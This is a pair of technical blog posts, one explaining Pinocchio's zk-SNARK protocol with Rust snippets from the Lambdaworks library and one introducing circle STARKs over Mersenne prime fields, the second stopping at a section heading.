A prime example are ZK Rollups</a>. Blockchains are verifiable computers; they achieve this verifiability by having each node re-execute every transaction and reach a consensus. The problem is that the weakest devices become the bottleneck. Adding more hardware does not make them faster, contrary to what happens in web2: the system becomes more robust and reliable, but the weakest devices continue limiting it. Using SNARKs, we can replace the re-execution with the verification of a proof, which is significantly faster (increasing throughput). Moreover, we can create proofs containing entire blocks of transactions, leading to effective scaling. In summary, we can move the execution off-chain to rollups and verify their proofs on-chain, allowing the system to scale.</p>
2. Protocol’s Preliminaries: From code to QAP</h2>
2.1 Arithmetic Circuits</h3>
The first thing we must do to be able to use any SNARK protocol is to find an efficient and systematic way to represent a computational code. And that’s what arithmetic circuits do: An arithmetic circuit is a computational model used to represent arithmetic operations in a structured way. It provides a systematic way to describe and compute complex mathematical functions. To learn more about arithmetic circuits you can see our post How to transform code into arithmetic circuits</a>.</p>
Now, if the prover wanted to demonstrate that given specific inputs, a particular code returns certain outputs, she could simply send the corresponding arithmetic circuit to the verifier, without any other protocol needed. The problem is that such a test would not be succinct at all, in fact it would practically be like sending the inputs and the code completely. That is why, in order to achieve a succinct proof, we will have to convert the arithmetic circuit to what we call a R1CS and then transform the R1CS obtained into a QAP.</p>
Below we will broadly explain what R1CSs and QAPs are. Note that it may be constructive to accompany this explanation with its respective implementations that can be found in Pinocchio from Lambdaworks library</a>.</p>
2.2 R1CS</h3>
R1CS stands for Rank-1 Constraint System. It allows us to express relationships between the circuit’s variables in a structured way using matrix</a> equations. More specifically, given an arithmetic circuit with a valid solution $c$, our goal will be to create a system of equations of the form $Ac \odot Bc = Cc$ with $A$, $B$ and $C$ matrices:</p>
To fully understand what R1CS are and how to build them, we recommend reading this article</a>. Nevertheless, we enumerate here the steps to transform an arithmetic circuit into an R1CS.</p>
    1. Identify all the variables used in the circuit. Let's call them $c = (1, c_1 , \ldots, c_N , c_{N + 1}, \ldots, c_m)$ where $\\{ c_1, \ldots, c_N \\}$ are the public variables and $\\{c_{ N + 1}, \ldots, c_m \\}$ are the intermediate and private variables of the circuit.</span></span>
    2. Represent the circuit as a system of equations with variables $\\{ c_i \\}_{i = 1}^{m}$ and just one multiplication per equation. We will call each equation a _constraint_ and $n$ the number of constraints.</span></span>
    3. Construct matrix $A \in { \mathbb{F_p} }^{n \times m}$ in the following way: $a_{ik}$ is the coefficient of the variable $c_k$ at the left entry of the constraint $i$.  </span></span></code></pre>
(If you don’t know what ${ \mathbb{F_p} }^{n \times m}$ means, don’t worry you could think it as ${\mathbb{R}}^{n \times m}$, so $A$ is just a matrix of numbers).
4. Analogously, construct matrix $B$ whose rows represent the right side of the multiplication of each constraint.
5. Construct matrix $C$ whose rows represent the result value of each constraint.
6. Finally, $c$ is a solution of the arithmetic circuit if and only if $Ac \odot Bc = Cc$, where $\odot$ represents the Hadamard Product</a>.</p>
2.3 QAP</h3>
So now we know that programs can be represented as arithmetic circuits and further converted into an R1CS. However, directly evaluating R1CS for verification purposes still isn’t succinct due to the large number of operations required, especially for complex computations. Quadratic Arithmetic Programs (QAPs) address this issue by providing a more efficient representation.</p>
QAPs encode the constraints of an R1CS into sets of polynomials</a>. This allows multiple constraints to be batched into a single polynomial equation. But why does using polynomials make the proof succinct? It’s all thanks to the mathematical result known as the Schwartz-Zippel Lemma</a>. To see in detail why this lemma makes the proof succinct and how we transform an R1CS into a QAP we recommend reading this chapter</a> of The RareSkills Book of ZK. Our goal is to be able to test the validity of a solution of the R1CS, checking that a certain polynomial has a given property. We leave here the steps with the notation that we will use below in the protocol:</p>
    1. Recieve the R1CS: $Ac \odot Bc = Cc$ where $A, B, C \in {\mathbb{F }_p }^{n \times m}$ and $c \in {\mathbb{F }_p }^m$.</span></span>
    2. Transform each column of $A$, $B$ and $C$ into polynomials:  </span></span></code></pre>
For each $k \in {1, \ldots, m}$, interpolate $(1, \ldots, n)$ with $(a_{1k} , \ldots , a_{nk} )$ the column $k$ of $A$. We will call the resulting polynomial $v_k(x)$.

Analogously, $w_k(x)$ and $y_k(x)$ interpolate the columns of $B$ and $C$ respectively.
3. Define the polynomials $$\begin{align}

p(x) &= \left(\sum_{k = 1 }^m c_k v_k(x) \right) \left(\sum_{k = 1 }^m c_k w_k(x) \right) - \sum_{k = 1 }^m c_k y_k(x), \ \newline

t(x) &= (x - 1)( x - 2)\ldots( x - n).

\end{align}$$We will call $t(x)$ the vanishing polynomial</em>.
4. Finally, $c$ is a solution of the R1SC if and only if there exists a polynomial $h$ such that $p(x) = h(x)t(x)$. This can be checked by choosing a random $s$ and verifying that $p(s) = h(s)t(s)$.</p>
3. Pinocchio’s Protocol</h2>
3.1 The idea behind</h3>
Now we are ready to understand the protocol. It starts with a one-time setup, where two keys are generated for proving and verifying these computations. The prover, who performs the computation, uses her key to create a proof that is small and constant in size, regardless of the computation’s complexity. This proof is then verified efficiently through mathematical checks that ensure the computation was done correctly. The system not only supports public verification, allowing anyone with the verification key to check the proof, but it can also be extended to provide privacy-protecting zero-knowledge proofs.</p>
3.2 Math Prelimenaries</h3>
Understanding Pinocchio’s protocol requires familiarity with key mathematical concepts, primarily elliptic curves, finite fields, and group theory. These form the foundation of the cryptographic operations and security proofs in Pinocchio (and SNARK protocols in general). For a detailed exploration of elliptic curves, refer to our post</a> where we talk about them. For a primer on fundamental structures like groups and fields, see our Math Survival Kit for Developers</a>. These resources provide the necessary background to appreciate Pinocchio’s intricate design.</p>
3.3 Some observations to understand the protocol</h3>
    * The prover and verifier agree on a pairing-friendly elliptic curve and generators of the groups $G_1$ and $G_2$ denoted by $g_1$ and $g_2$, respectively. In our case, we choose BLS12-381.</span></span>
    * Technically, it is not necessary to work with two groups to implement the protocol. That is, the entire implementation can be interpreted using $G_1 = G_2 = G$ and $g_1 = g_2 = g$. In fact in the original Pinocchio's Paper you can find it that way. However, Type I pairings (that is, those whose domain is of the form $G \times G$) are very inefficient. Furthermore, BLS12-381 and BN254 are curves that have relevance for Ethereum and that is why we choose to work on them in general.</span></span>
    * We are using $+$ to denote the operation of the groups $G_1$ and $G_2$. For example, $\alpha_v \cdot g_2 = \underbrace{g_2 + \ldots + g_2}_{\alpha_v \text{ times}}$.</span></span></code></pre>3.4 The protocol</h3>
In the following section we present the protocol with some code snipets from the implementation</a> we made using the Lambdaworks library.</p>
Setup</h4>
Select eight private random elements $s$, $\alpha_v$, $\alpha_w$, $\alpha_y$, $\beta$, $r_v$, $r_w$, $\gamma$ from $\mathbb{F_p}$, and set $r_y = r_v \cdot r_w$. This set of elements are called toxic waste</em> and should be discarded and wholly forgotten once the keys have been generated.</p>
pub struct ToxicWaste {</span></span>
    rv: FE,</span></span>
    rw: FE,</span></span>
    s: FE,</span></span>
    // .... (other elements)</span></span>
</span>
</span>
impl ToxicWaste {</span></span>
    pub fn sample() -> Self {</span></span>
        Self {</span></span>
            s: sample_fr_elem(),</span></span>
            alpha_v: sample_fr_elem(),</span></span>
            // ... (other elements)</span></span>
        }</span></span>
    }</span></span>
    </span></span>
    pub fn ry(&self) -> FE {</span></span>
        &self.rv * &self.rw</span></span>
    }</span></span>
}</span></span></code></pre>
Two public keys are generated in the Setup: the evaluation key, that is sent to the prover and the verification key, that is send to the verifier.</p>
The verification key</h5>
    1. $g_2$</span></span>
    2. $\alpha_v \cdot g_2$</span></span>
    3. $\alpha_w \cdot g_2$</span></span>
    4. $\alpha_y \cdot g_2$</span></span>
    5. $\gamma \cdot g_2$</span></span>
    6. $\beta \gamma \cdot g_2$</span></span>
    7. $r_y t(s) \cdot g_1$</span></span>
    8. $\\{r_v v_k(s) \cdot g_1 \\}_{k \in \\{0,\ldots, N \\} }$</span></span>
    9. $\\{r_w w_k(s) \cdot g_2 \\}_{k \in \\{0,\ldots, N \\} }$</span></span>
    10. $\\{r_y y_k(s) \cdot g_1 \\}_{k \in \\{0,\ldots, N \\} }$</span></span></code></pre>
To implement this in rust, we first need to create a struct VerificationKey with each element and then generate it.</p>
pub struct VerificationKey {</span></span>
    pub g2: G2Point,</span></span>
    pub g2_alpha_v: G2Point,</span></span>
    pub g2_alpha_w: G2Point,</span></span>
    // ...</span></span>
}</span></span>
</span>
</span>
pub fn generate_verification_key(</span></span>
    qap: QuadraticArithmeticProgram,</span></span>
    toxic_waste: &ToxicWaste,</span></span>
) -> VerificationKey {</span></span>
    let g1: G1Point = Curve::generator();</span></span>
    let g2: G2Point = TwistedCurve::generator();</span></span>
    </span></span>
    // declare the rest of the variables needed</span></span>
    // ...</span></span>
</span>
    VerificationKey {</span></span>
        g2: g2.clone(),</span></span>
        g2_alpha_v: g2.operate_with_self(toxic_waste.alpha_v.representative()),</span></span>
        // ... </span></span>
    }</span></span>
}</span></span></code></pre>The evaluation key</h5>
    1. $\\{r_v v_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    2. $\\{r_w w_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    3. $\\{r_w w_k(s) \cdot g_2 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    4. $\\{r_y y_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    5. $\\{r_v \alpha_v v_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    6. $\\{r_w \alpha_w w_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    7. $\\{r_y \alpha_y y_k(s) \cdot g_1 \\}_{k \in \\{N + 1, \ldots, m \\}}$</span></span>
    8. $(r_v \beta v_k(s) + r_w \beta w_k(s) + r_y \beta y_k(s)) \cdot g_1$</span></span>
    9. $\\{ s^i \cdot g_2 \\}_{i \in \\{ 1,\ldots,d \\} }$ where $d$ is the degree of $t(x) = (x - 1) \ldots (x - n)$. That is, $d = n$ the number of raws of the R1SC matrices (i.e. the number of constraints).</span></span>
</span>
pub struct EvaluationKey {</span></span>
    pub g1_vk: Vec<G1Point>,</span></span>
    pub g1_wk: Vec<G1Point>,</span></span>
    pub g2_wk: Vec<G2Point>,</span></span>
    // ... </span></span>
}</span></span>
</span>
</span>
pub fn generate_evaluation_key(</span></span>
    qap: &QuadraticArithmeticProgram,</span></span>
    toxic_waste: &ToxicWaste,</span></span>
) -> EvaluationKey {</span></span>
    let g1: G1Point = Curve::generator();</span></span>
    let g2: G2Point = TwistedCurve::generator();</span></span>
    let (v_mid, w_mid, y_mid) = (qap.v_mid(), qap.w_mid(), qap.y_mid());</span></span>
    </span></span>
    // declare the rest of the variables needed</span></span>
    // ...</span></span>
    </span></span>
    EvaluationKey {</span></span>
        g1_vk: vs_mid.iter()</span></span>
            .map(|vk| g.operate_with_self((rv * vk.evaluate(&s))</span></span>
            .representative()))</span></span>
            .collect(),</span></span>
,</span></span>
        // ... </span></span>
    }</span></span>
}</span></span></code></pre>
Having EvaluationKey and VeifiationKey, we can then implement the setup:</p>
pub fn setup(</span></span>
    qap: &QuadraticArithmeticProgram,</span></span>
    toxic_waste: ToxicWaste,</span></span>
) -> (EvaluationKey, VerificationKey) {</span></span>
    (generate_evaluation_key(&qap, &toxic_waste),</span></span>
     generate_verification_key(qap.clone(), &toxic_waste))</span></span>
}</span></span></code></pre>Prove</h4>
The steps for the prover are as follows:</p>
    1. Evaluate the circuit with the input values and obtain ${c_{N + 1}, \ldots, c_m }$ the intermediate values.</span></span>
</span>
    2. Compute the polynomial $$p(x) = \left(\sum_{k = 1}^m c_k v_k(x) \right) \left(\sum_{k = 1}^m c_k w_k(x) \right) - \sum_{k = 1}^m c_k y_k(x).$$</span></span>
</span>
    3. Calculate the polynomial $h(x) = \frac{p(x)}{t(x)}$.</span></span>
</span>
    4. Produce the proof $$\pi = (V, W_1, W_2, Y, V', W', Y', Z, H),$$ computing its elements:</span></span>
</span>
       * $V = \sum\limits_{k = N + 1}^m c_k \cdot \underbrace{\style{color: olive;}{r_v v_k(s) \cdot g_1}}_{\style{color: olive;}{\begin{array}{c} \text{From the} \ \text{evaluation key} \end{array}}}$</span></span>
       * $W_1 = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w w_k(s) \cdot g_1}$</span></span>
       * $W_2 = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w w_k(s) \cdot g_2}$</span></span>
       * $Y = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_y y_k(s) \cdot g_1}$</span></span>
       * $V' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_v \alpha_v v_k(s) \cdot g_1}$</span></span>
       * $W' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w \alpha_w w_k(s) \cdot g_1}$</span></span>
       * $Y' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_y \alpha_y y_k(s) \cdot g_1}$</span></span>
       * $Z = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{(r_v \beta v_k(s) + r_w \beta w_k(s) + r_y \beta y_k(s)) \cdot g_1}$</span></span>
       * $H = h(s) \cdot g_2 = \sum\limits_{i = 1 }^d h_i \cdot \style{color: olive;} {s^i \cdot g_2}$</span></span>
    5. Send the public values $(c_1, \ldots, c_N)$ and the proof $\pi$.</span></span>
</span>
pub fn generate_proof(</span></span>
    evaluation_key: &EvaluationKey,</span></span>
    qap: &QuadraticArithmeticProgram,</span></span>
    qap_c_coefficients: &[FE],</span></span>
) -> Proof {</span></span>
    // We will call {c_{N+1}, ... , c_m} cmid.</span></span>
    let cmid = &qap_c_coefficients[qap.number_of_inputs</span></span>
    ..qap_c_coefficients.len() - qap.number_of_outputs];</span></span>
    </span></span>
    // We transform each FieldElement of the cmid into an UnsignedInteger so we can multiply them to g1.</span></span>
    let c_mid = cmid</span></span>
        .iter()</span></span>
        .map(|elem| elem.representative())</span></span>
        .collect::<Vec<_>>();</span></span>
</span>
    let h_polynomial = qap.h_polynomial(qap_c_coefficients);</span></span>
    let h_coefficients = h_polynomial.coefficients</span></span>
        .iter()</span></span>
        .map(|elem| elem.representative())</span></span>
        .collect::<Vec<_>>();</span></span>
    let h_degree = h_polynomial.degree();</span></span>
</span>
    Proof {</span></span>
        v: msm(&c_mid, &evaluation_key.g2_vk_s).unwrap(),</span></span>
        w1: msm(&c_mid, &evaluation_key.g2w_wk).unwrap(),</span></span>
        w2: msm(&c_mid, &evaluation_key.g2w_wk).unwrap(),</span></span>
        //...</span></span>
</span>
</span>
    }</span></span>
}</span></span></code></pre>Verify</h4>
So that no malicious prover deceives the verifier, he has to ensure two things: Firstly, that the requested condition (number 4) of the QAP’s polynomial is satisfied; and secondly, that the proof’s elements have been generated from the QAP correctly. To achieve this, the verifier will do three checks. The first check will ensure the validity of the QAP and the other two checks, the correct construction of the proof’s elements.</p>
We will denote $e$ to the pairing whose first argument is a point from $G_1,$ and the second from $G_2$.</p>
Check 1: Correctness of the QAP</strong>

To be sure that the provided proof corresponds to a valid solution of the QAP, and thus a correct computation result, the verifier needs to be convinced that $p(s) = h(s)t(s)$. To achieve this he can simply check $$e(V_{io} + V, W_{io} + W_2 ) = e( \style{color: teal}{r_y t(s) \cdot g_1} , H ) e(Y_{io} + Y, \style{color: teal}{g_2} ),$$ where to simplify the notation we call</p>
    * $V_{io} = \style{color: teal}{r_v v_0(s) \cdot g_1} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_v v_k(s) \cdot g_1}$</span></span>
    * $W_{io} = \style{color: teal}{r_w w_0(s) \cdot g_2} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_w w_k(s) \cdot g_2}$</span></span>
    * $Y_{io} = \style{color: teal}{r_y y_0(s) \cdot g_1} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_y y_k(s) \cdot g_1}$</span></span>
</span>
pub fn check_divisibility(</span></span>
    verification_key: &VerificationKey,</span></span>
    proof: &Proof,</span></span>
    c_io: &[FE],</span></span>
) -> bool {</span></span>
    // We will use hiding_v, hiding_w and hiding_y as arguments of the pairings.</span></span>
    </span></span>
    // We transform the c_io into UnsignedIntegers.</span></span>
    let c_io = c_io</span></span>
    .iter()</span></span>
    .map(|elem| elem.representative())</span></span>
    .collect::<Vec<_>>();</span></span>
    </span></span>
    let v_io = verification_key.g1_vk[0]</span></span>
        .operate_with(&msm(&c_io, &verification_key.g1_vk[1..]).unwrap());</span></span>
        </span></span>
    // The same with w_io and y_io.</span></span>
    //...</span></span>
    </span></span>
    Pairing::compute(</span></span>
        &v_io.operate_with(proof.v), </span></span>
        &w_io.operate_with(proof.w)</span></span>
    ).unwrap()</span></span>
    == Pairing::compute( ... , ...).unwrap() </span></span>
    * Pairing::compute( ... , ...).unwrap()</span></span>
    </span></span>
}</span></span></code></pre>
Correct construction of $V$, $W$ and $Y$:</strong></p>
Check 2:</strong> The veifier checks that the prover used the polynomials of the QAP to construct $V$, $W$ and $Y$, and that he didn’t provide arbitrary values that simply pass the previous check.</p>
So, in this check the goal is to verify that $V$ is $g_1$ multiplied by some linear combination of ${v_k(s)}_{k \in {1,\ldots,m}}$, and analogously, with $W$ and $Y$:</p>
    * $e(V', \style{color: teal} {g_2}) = e(V, \style{color: teal} {\alpha_v \cdot g_2})$</span></span>
    * $e(W', \style{color: teal} {g_2}) = e(W, \style{color: teal} {\alpha_w \cdot g_2})$</span></span>
    * $e(Y', \style{color: teal} {g_2}) = e(Y, \style{color: teal} {\alpha_y \cdot g_2})$</span></span>
</span>
pub fn check_appropriate_spans(</span></span>
    verification_key: &VerificationKey,</span></span>
    proof: &Proof</span></span>
) -> bool {</span></span>
    let b1 = Pairing::compute(&proof.v_prime, &verification_key.g2) </span></span>
        == Pairing::compute(&proof.v, &verification_key.g2_alpha_v);</span></span>
    let b2 = Pairing::compute( ... , ... ) </span></span>
        == Pairing::compute(... , ... );</span></span>
    let b3 = // ...</span></span>
    </span></span>
    b1 && b2 && b3</span></span>
}</span></span></code></pre>
Why does this work?</p>
If this check passes, the verifier can be sure that, for example, $V’ = \alpha_v V$. Looking at the evaluation key, he sees that the prover doesn’t know the raw value of $\alpha_v$. So the only way the prover could have constructed $V$ and $V’$ such that they satisfy this equality is using a linear combination of ${v_k(s)}_{k \in {1,\ldots,m }}$. Similarly, he can be convinced that $W$ and $Y$ were constructed that way.</p>
Check 3:</strong> The previous check is not enough to ensure that the proof elements were constructed correctly. We also need to verify that the prover used the same set of coefficients ${c_1,\ldots,c_m}$ in each linear combination $V$, $W$ and $Y$ of the previous check.</p>
$$e(Z, \style{color: teal} {\gamma \cdot g_2}) = e(V+W+ Y, \style{color: teal} {\beta \gamma \cdot g_2}) $$</p>
pub fn check_same_linear_combinations(</span></span>
    verification_key: &VerificationKey,</span></span>
    proof: &Proof</span></span>
) -> bool {</span></span>
    Pairing::compute(&proof.z, &verification_key.g2_gamma)</span></span>
    == Pairing::compute(</span></span>
        &proof.v</span></span>
            .operate_with(&proof.w)</span></span>
            .operate_with(&proof.y),</span></span>
        &verification_key.g2_beta_gamma</span></span>
    )</span></span>
}</span></span></code></pre>
Putting it all together</p>
pub fn verify(verification_key:&VerificationKey,</span></span>
    proof: &Proof,</span></span>
    c_inputs_outputs: &[FE]</span></span>
) -> bool {</span></span>
    let b1 = check_divisibility(verification_key, proof, c_inputs_outputs);</span></span>
    let b2 = check_appropriate_spans(verification_key, proof);</span></span>
    let b3 = check_same_linear_combinations(verification_key, proof);</span></span>
    </span></span>
    b1 && b2 && b3</span></span>
}</span></span></code></pre>6. Turning a SNARK into a ZK-SNARK</h2>
What does it mean zero-knowledge? We would like to be impossible for the verifier to gain any information from the proof, as it appears indistinguishable from random data.</p>
To make it zero-knowledge, the prover has to sample some random values $\delta_v,\delta_w,\delta_y$ and make the following changes to the polynomials:</p>
$v_{mid}(x) + \delta_v t(x), v(x) + \delta_v t(x),w(x) + \delta_w t(x) \text{ and } y(x) + \delta_y t(x).$</p>
You can see in detail the zk adaptation of the protocol in the Chapter 4.13</a> of Why and How zk-SNARK Works</em>.</p>
7. Summary</h2>
In this post we covered the main ideas behind Pinocchio’s protocol and our implementation using Lambdaworks library. We first saw the steps to transform code into a QAP. Then, we presented the actual protocol explaining how it works and why we need each different check to achieve security. Finally, we observed that while its primary objective is to achieve verifiable computation, it can incorporate zero-knowledge properties with minimal additional effort.</p>


An introduction to circle STARKs
Unknown — Thu, 25 Jul 2024 00:00:00 +0000
Introduction</h2>
Scalable, transparent arguments of knowledge (STARKs) have gained widespread attention due to their applications in verifiable computing and blockchain scalability. We can use STARKs to generate a short string that attests to the integrity of a computation and a verifier can verify it very fast. The steps to generate a STARK proof consist of the following:</p>
    1. Represent the computation as a system of polynomial constraints/equations. This could be the Algebraic Intermediate Representation (AIR) or Plonkish arithmetization. We will use AIR for the remainder of the post.</span></span>
    2. Obtain the execution trace for the program.</span></span>
    3. Interpret each column of the execution trace as the evaluations of a univariate polynomial over some smooth domain $D$ (this step is called interpolation).</span></span>
    4. Evaluate the trace polynomials over a larger and disjoint domain $D_0$ and build a Merkle tree using the evaluations.</span></span>
    5. Enforce the constraints on the trace polynomials.</span></span>
    6. To ensure that the constraints are satisfied, divide each polynomial in step 5 by the vanishing polynomial on the set where the constraints hold. The constraints are fulfilled if the result of the division is a polynomial.</span></span>
    7. If there are many polynomials, get random values from the verifier to perform a linear combination; with high probability the constraints hold if the result is a polynomial.</span></span>
    8. Evaluate the resulting function over $D_0$ and build a Merkle tree from those evaluations.</span></span>
    9. To show that the evaluations belong to a polynomial of at most degree $n$ (and not a higher degree or rational function), apply the [FRI protocol](/how-to-code-fri-from-scratch/).</span></span></code></pre>
The efficiency of STARKs depends on working over smooth fields, where we can use the radix-2 Cooley-Tukey Fast Fourier Transform (FFT) to perform fast interpolation and evaluation. We say that the field is smooth if $p - 1 = 2^m c$, where $m$ is sufficiently large and $c$ is an odd number. Examples of fields having this property are STARK-252, $2^{64} - 2^{32} + 1$ (sometimes called Mini-Goldilocks or oxfoi prime), $2^{31} - 2^{27} + 1$ (Baby Bear).</p>
One of the main advantages of STARKs is that we can work over “small fields” (their size is smaller than needed for cryptographic security), reducing the overhead needed to represent variables in the execution trace/virtual machine. We can then sample randomness from an extension field to achieve cryptographic security. Binius</a> shows how we can represent variables with zero overhead using binary fields.</p>
In this post we will provide an explanation of Circle STARKs</a>, how we can use the circle group to access very fast modular arithmetic and why we need certain properties to be able to perform STARKs over the circle group. To do so, we need to develop the circle analogues of classical STARKs: bivariate polynomials, smooth domains, circle codes, vanishing polynomials, FFT and FRI. While many things seem quite close to their classical analogues, there are some subtleties that arise and special limits or points where we should be careful. If you want to see how these primitives are implemented, you can check Starkware’s prover Stwo</a>, Polygon’s Plonky3</a> and Vitalik’s python implementation</a>. If you need a recap on classical STARKs, see post 1</a> and post 2</a>.</p>
Mersenne primes</h2>
Mersenne primes have the form $2^p - 1$, where $p$ is prime ($2^p - 1$ is not always prime for every prime $p$). They have nice reduction formulae (since $2^p \equiv 1 \pmod{2^p - 1}$) and lead to very fast modular arithmetic (which in turn is crucial to performance in STARKs). Some Mersenne primes are:</p>
    * $2^2 -1 = 3$</span></span>
    * $2^3 - 1 = 7$</span></span>
    * $2^5 - 1 = 31$</span></span>
    * $2^7 - 1 = 127$</span></span>
    * $2^{31} - 1 = 2147483647$</span></span>
    * $2^{61} - 1$</span></span>
    * $2^{127} - 1$</span></span></code></pre>
The problem with using Mersenne primes with STARKs is that $p - 1 = 2c$, where $c$ is odd, meaning that they are not smooth. This way, we cannot perform interpolation efficiently using the FFT. A way to circumvent this is to have the interpolation domain live in a quadratic extension of a Mersenne prime, as explained here</a>. However, this approach is not well suited for constraint evaluations (quotient computations), limiting performance for traces frequently encountered in zkvms.</p>
This shortcomings can be avoided by switching to the circle curve $x^2 + y^2 = 1$ over the field given by the Mersenne prime. The circle, equipped with the operation inherited from the rotation group over the field, is a cyclic group. Moreover, the number of elements is equal to $q + 1$. For a Mersenne prime, this means that $q + 1 = 2^p$.</p>
Mersenne primes satisfy also that $q \equiv 3 \pmod {4}$, which implies that $x^2 + 1$ is irreducible over $q$. We will have $i$ satisfy $i^2 = -1$ and work with extensions $F$ of $F_q$. To keep with the notation of the paper, $F(i)$ is a quadratic extension of the base field $F$.</p>
Polynomials</h2>
We will denote $F[x]^d$ the univariate polynomials of degree at most $d$ and $F[x,y]^d$ the bivariate polynomials of degree at most $d$. For example, $x + 2x^5 + x^{34}$ is in $F_q [x]^{36}$ but $x^{56} + 1$ is not. Similarly, $1 + x y^2 + x^{34} + y^{35} + x^{12} y^{12}$ is in $F_q [x,y]^{64}$ but not $x^{32} y^{34} + x^{12} + 25$.</p>
In circle STARKs, we will work with bivariate polynomials modulo $x^2 + y^2 - 1$. Since $y^2 = x^2 - 1$, we can always express a polynomial $F[x,y]^d$ as

$f(x,y) = f_0 (x) + y f_1 (x)$

which we call the canonical representation of the polynomial. As an example, say we have the polynomial

$p(x,y) = x + 4 y^3 + 5 x^2 y^5 + x y^6$

We can replace $y^2 = x^2 - 1$ and get

$p(x,y) = x + 4 y (x^2 - 1) + 5x^2 y (x^2 - 1)^2 + x (x^2 - 1)^3$

From this, we get that

$f_0 (x) = x + x (x^2 - 1)^3$

$f_1 (x) = 4 (x^2 - 1) + 5x^2 (x^2 - 1)^2$</p>
This decomposition is useful to compute the circle FFT and FRI. Something nice about $f_0 (x)$ and $f_1 (x)$ is that they are both univariate, which will lead to additional simplicity and performance for the subsequent steps (the only thing we need to be careful about is the structure of the squaring map for $x$. Instead of having $x \rightarrow x^2$ we have $x \rightarrow 2x^2 - 1$).</p>
The circle group</h2>
Circle points are pairs $(x_0 , y_0)$ (with coordinates in the field $F$) satisfying the equation $x_0^2 + y_0^2 = 1$. We can induce a group structure by considering the following operation,

$(x_0 , y_0 ) \cdot (x_1 , y_1 ) = (x_0 x_1 - y_0 y_1 , x_0 y_1 + x_1 y_0 )$

If we fix $P = (P_x , P_y)$ we can define the rotation by $P$, $T_P (x , y) = (x_0 P_x - y_0 P_y , x_0 P_y + P_x y_0 )$. This operation is important when we need to evaluate transition constraints. For example, if we want to check that we are computing a Fibonacci sequence, we need to show that $a_{n + 2} = a_{n + 1} + a_{n}$. If we have the trace polynomial $t(x)$, we can get the next element to $x$ just by multiplying by $\omega$, the generator of the interpolation domain and have the Fibonacci constraint be $t(\omega^2 x) = t(\omega x) + t(x)$. If we choose $P$ as the generator of the (circle) interpolation domain, we can use the same idea to write these constraints.</p>
Inverses can be calculated pretty straightforward: if $P = (x , y)$, then $-P = (x, -y)$.</p>
An important map is the square mapping, $\pi (x,y) = (x^2 - y^2 , 2xy) = (2x^2 - 1, 2xy)$. We can see that the first component depends only on $x$. The square map produces a two-to-one reduction when acting over subgroups or special cosets (called twin position cosets). Operations over the circle are implemented here in Stwo</a>.</p>
To learn more about the domains over the circle or types of cosets, see Plonky3’s implementation</a>.</p>
Circle codes</h2>
The circle code is obtained by evaluating a polynomial $f(x,y)$ over a proper subset $D$ of the circle group over $F_q$. It can be proven that there is a one-to-one correspondence with Reed-Solomon codes (basically, circle codes are Reed-Solomon codes).</p>
Vanishing polynomials</h2>
In classical STARKs, we need to compute the vanishing polynomials over a set to then produce quotients. We need to find what these vanishing polynomials will look like in circle STARKs. The interesting result is that vanishing polynomials will be univariate, $v(x)$. Vanishing polynomials of order $n$ can be computed efficiently in $\log (n)$ operations: a squaring, a doubling and a subtraction by one. The vanishing polynomials are:

$v_1 (x) = x$

$v_2 (x) = 2x^2 - 1$

$v_3 (x) = 2(x^2 - 1)^2 - 1$

$v_4 (x) = 2((x^2 - 1)^2 - 1)^2 - 1$

$v_5 (x) = 2(((x^2 - 1)^2 - 1)^2 - 1)^2 - 1$</p>
You can check how to evaluate the vanishing polynomials in Stwo</a>.</p>
As in the case of classical STARKs, if $v_H (x)$ and $v_J (x)$ are vanishing polynomials over the sets $H$ and $J$, the quotient $v_H (x) / v_J (x)$ is a vanishing polynomial over $H \backslash J$. This way, we can compute efficiently constraints that apply over $H \backslash J$.</p>
Circle FFT</h2>
The inverse FFT takes a vector of evaluations and produces the coordinates of a polynomial over some basis. The FFT takes the coordinates over the basis and produces a set of evaluations. We are used to the monomial basis, $1, x, x^2 , x^3 , … x^n$, but there are other options available. In the case of the circle FFT, the basis looks more complicated, but remember that what we want is just to encode values into polynomials and then evaluate them over a larger domain. For an FFT involving $n$ elements, let $j_0 j_1 j_2 \dots j_{n - 1}$ be the binary decomposition of $0 \leq k \leq n - 1$, that is $k= j_0 + 2j_1 + 4j_2 + \dots 2^{n - 1} j_{n - 1}$. The $k$-th basis polynomial is given by:

$b_k (x , y) = y^{j_0} v_1 (x)^{j_1} v_2 (x)^{j_2} \dots v_{n - 1} (x)^{j_{ n - 1} }$

To clarify the expression, here we have the first basis polynomials,

$b_0 (x) = 1$

$b_1 (x) = y$

$b_2 (x) = v_1 (x) = x$

$b_3 (x) = y v_1(x) = x y$

$b_4 (x) = v_2 (x) = 2x^2 - 1$

$b_5 (x) = y v_2 (x) = y( 2x^2 - 1)$

$b_6 (x) = v_1 (x) v_2 (x) = x (2x^2 - 1)$</p>
If we need to evaluate a polynomial of degree $n$ over $\beta n$ points $\beta \geq 2$, we can zero-pad the polynomial with no problem.</p>
In the first step of the FFT, we use the split of the canonical representation of the polynomial, $p(x, y) = f_0 (x) + y f_1 (x)$. The following steps deal with a univariate polynomial $f_j (x)$, where we can apply the even-odd decomposition, taking into account that the square mapping follows the circle operation. In other words,

$f_{j,e} (2x^2 - 1) = (f_j (x) + f_j (- x))/2$

$f_{j,o} (2x^2 - 1) = (f_j (x) - f_j (- x))/2x$</p>
We can continue breaking everything down until we can solve the FFT directly, using the butterflies</a>.</p>
The twiddle factors for the first step are different from those used on the second.</p>
Other changes in circle STARKs</h2>
